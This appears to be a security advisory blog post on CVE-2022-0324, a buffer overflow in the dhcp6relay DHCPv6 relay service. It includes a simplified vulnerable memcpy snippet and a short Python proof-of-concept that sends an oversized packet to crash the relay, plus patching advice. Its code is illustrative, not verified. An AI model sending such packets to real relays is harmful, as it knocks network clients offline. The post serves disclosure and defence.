Recently, a significant security vulnerability—CVE-2022-0324—was discovered in the DHCPv6 relay (dhcp6relay) service. If you’re using DHCPv6 relay in your network, particularly inside dockerized environments, keep reading. This post breaks down what went wrong, how the vulnerability can be exploited, and what you must do to stay secure.

What Is CVE-2022-0324?

_CVE-2022-0324_ is a buffer overflow vulnerability in the way the dhcp6relay process parses incoming DHCPv6 packets. A remote attacker can craft a malicious packet and trigger an out-of-bounds memory write, causing the service to crash. This attack vector is especially problematic because dhcp6relay is a critical process that, when crashed, can halt DHCP relay functions or even take down the containing docker container.

This vulnerability was discovered by Eugene Lim of GovTech Singapore.

The Root Cause: memcpy() in DHCPv6 Packet Parsing

The issue lies in how dhcp6relay handles certain DHCPv6 packets. Specifically, when parsing incoming packets, dhcp6relay uses the memcpy() function to copy packet content into a buffer. Unfortunately, it does not properly check if the incoming packet is larger than the allocated buffer, resulting in a classic buffer overflow scenario.

Simplified Vulnerable Code Snippet

char relay_buffer[512];
int packet_len = get_packet_length(packet);  // length from packet, could be > 512

// Vulnerable call: Doesn't check if packet_len > size of relay_buffer!
memcpy(relay_buffer, packet, packet_len);

If a remote attacker sends a specially crafted packet with a size larger than 512 bytes (or whatever the buffer is sized to handle), the memcpy() call would write past the end of the buffer. This causes a buffer overflow, which can overwrite adjacent memory and crash the process.

What Can an Attacker Do?

- Remote Crash (DoS): An attacker on the network can send a single, oversized DHCPv6 packet to the relay. This will trigger the buffer overflow, crashing the dhcp6relay process and possibly the entire DHCP relay docker container. Result: network clients lose the ability to get IPv6 addresses via relay.
- Potential for Remote Code Execution: While there’s no public exploit for remote code execution at the moment, buffer overflows of this type have historically been used as a stepping stone for gaining further control over processes or even containers.

Proof-of-Concept Exploit (for testing in a safe lab!)

*Warning: Only use this in a controlled testing environment.*

import socket

# DHCPv6 UDP port
DHCPV6_PORT = 547

# Oversized DHCPv6 packet (example)
packet = b'\x00' * 1024  # 1024 bytes (vulnerable buffer is only 512 bytes)

# Send malicious packet
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.sendto(packet, ("fe80::1", DHCPV6_PORT))
print("Malicious packet sent")

This script simply sends an oversized packet to the DHCPv6 relay process, which may cause it to crash if it’s vulnerable.

Impact on Real-world Networks

- Denial of Service: DHCPv6 relay agents are core infrastructure. If they go down, new devices can’t join the network, and dynamic network addressing may cease to work.
- Container Disruption: If dhcp6relay is running inside a docker container, a successful attack can shut down the entire container, affecting interconnected services.

Mitigation and Patch

1. Upgrade: The maintainers of dhcp6relay have released patched versions. Always update to the latest release.
2. Network Segmentation: Limit untrusted DHCPv6 packets from untrusted networks reaching your relay.

References and Further Reading

- CVE-2022-0324 in the NVD
- ISC DHCP Project Home
- DHCPv6 Relay Agent Docker Documentation

Conclusion

CVE-2022-0324 is a stark reminder that even basic packet handling functions can introduce severe vulnerabilities if not implemented with strict safety checks. DHCPv6 relay is core infrastructure—take this vulnerability seriously, update your systems, and stay safe.

Timeline

Published on: 11/14/2022 17:15:00 UTC
Last modified on: 11/17/2022 23:16:00 UTC